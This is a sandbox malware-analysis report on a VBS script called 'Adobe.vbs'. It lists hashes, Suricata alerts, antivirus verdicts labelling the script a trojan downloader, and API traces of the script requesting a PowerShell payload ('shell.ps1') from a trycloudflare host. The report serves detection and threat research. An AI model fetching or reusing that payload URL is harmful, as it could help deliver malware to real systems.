popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Adobe.vbs

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 3, 2025, 9:57 a.m. April 3, 2025, 9:59 a.m.
Size 1.4KB
Type ASCII text, with CRLF line terminators
MD5 607e7e4b5eee718c11d6305f99fc7b4f
SHA256 01fcffe559c031d49107df1d551e267736c2424a8bd64843bd041a6c6cd0eccc
CRC32 F5DC808D
ssdeep 24:HvlG+hiXYJGBAWqah7PNiDqeqrsBOd2rO7X6OUVvUEw6:PlG+h5JEAs7P4VTiTSVlw6
Yara None matched

Name Response Post-Analysis Lookup
dat-voip-sit-cio.trycloudflare.com
A 104.16.231.132
A 104.16.230.132
104.16.231.132
IP Address Status Action
104.16.230.132 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.101:49161 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49161 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49161 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49161
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

request GET https://dat-voip-sit-cio.trycloudflare.com/shell.ps1
Skyhigh BehavesLike.VBS.Dropper.zp
Sangfor Malware.Generic-Script.Save.d1d20a66
ESET-NOD32 VBS/TrojanDownloader.Agent.ABVR
Kaspersky HEUR:Trojan.VBS.Alien.gen
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:dnjkLnnaHyD)
Ikarus Win32.Outbreak
Microsoft Trojan:VBS/Obfuse.ZDO!MTB
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://dat-voip-sit-cio.trycloudflare.com/shell.ps1
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /shell.ps1
1 13369356 0

InternetReadFile

 buffer: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title> </head><body> <h1>404 Not Found</h1> <p>404 Not Found: /shell.ps1</p> <hr/> <a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.3</a> - 2025-04-02 20:57:21.063221 </body></html>
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://dat-voip-sit-cio.trycloudflare.com/shell.ps1
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /shell.ps1
1 13369356 0

send

 buffer: !
socket: 820
sent: 1
1 1 0

send

 buffer: …gíÜæÄҚo®ÛP õƘxs0o ^æƒA_e¤‚/5 ÀÀÀ À 28@ÿ'%"dat-voip-sit-cio.trycloudflare.com  
socket: 948
sent: 138
1 138 0

send

 buffer: !
socket: 820
sent: 1
1 1 0

send

 buffer: FBA¤ 3AA *®ïlEpR¦•ØI •1òƬçòùðâQ>~_›—'ÍïXõŠ ç°§üOwɮܛûø¢§û£0qá3,A¤bJlô]ƯÅ”ã4êÜ ìԎ:,9¶H×ò‡ï2L˜¬É6“ꊚ[D
socket: 948
sent: 134
1 134 0

send

 buffer: !
socket: 820
sent: 1
1 1 0

send

 buffer: `¥V‹›½ê!Óe˜[ý#òì•é~%ó,Z^…·² ½LW–çü¾Éý.9RF2!,åa0CÝòoòÕMñÕs`;·0>g6b²S9ò-éŸDX鲏TcʅaÍ??i×®÷ an ٝ.¥ Üøï‰/ÿÌìp]±ª@ԇy 8¯Mþz¢|ßþéÓݧ˜ä2·ÏL]ÿR&4Þ.Ö×p‰è¤þÉ¨ôšê|Ôόëé…àƽµízF%‰ÊxÖ:Oø ø³nŽpP6PGØ ÜÈíÀ±Mø×zH$׶G?H{>þ ¯îEaA“éñ‘ânkKȁ3¢'’ºÓOg[.Õnoªd Ñ£¼O~Ó?¤Re{ÒÍ/Az=i€¹ûŸ ¾iÞ’cöË*˄‰» oÌ¡8>kù; ”³kÞV®¬wž2–Õ±
socket: 948
sent: 357
1 357 0

send

 buffer: !
socket: 820
sent: 1
1 1 0